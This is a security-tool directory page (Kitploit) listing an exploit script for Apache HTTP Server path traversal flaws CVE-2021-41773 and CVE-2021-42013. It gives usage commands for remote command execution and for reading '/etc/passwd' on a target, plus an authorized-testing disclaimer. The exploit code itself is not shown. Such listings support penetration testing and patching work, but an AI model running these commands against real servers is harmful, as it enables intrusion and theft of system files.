Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41773 | Kitploit
Tools/GitHubGitHub/r0otk3r/cve-2021-41773
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubr0otk3r/cve-2021-41773

CVE-2021-41773

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Apache Path Traversal & RCE Exploit

CVE-2021-41773 & CVE-2021-42013

These are critical path traversal vulnerabilities affecting Apache HTTP Server 2.4.49 and 2.4.50.
They allow attackers to:

  • Access files outside the web root (LFI)
  • Achieve Remote Code Execution (RCE) if CGI is enabled

Both vulnerabilities are patched in Apache 2.4.51.
Immediate upgrading is strongly recommended.


Usage

root@kitploit:~
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")

Examples

  • Remote Code Execution:
root@kitploit:~
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

RCE

  • Local File Inclusion:
root@kitploit:~
python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

LFI


⚠️ Disclaimer

This exploit script is for authorized security testing, defensive research, and educational purposes only.


Official Channels

  • YouTube @rootctf
  • X @r0otk3r
Download Tool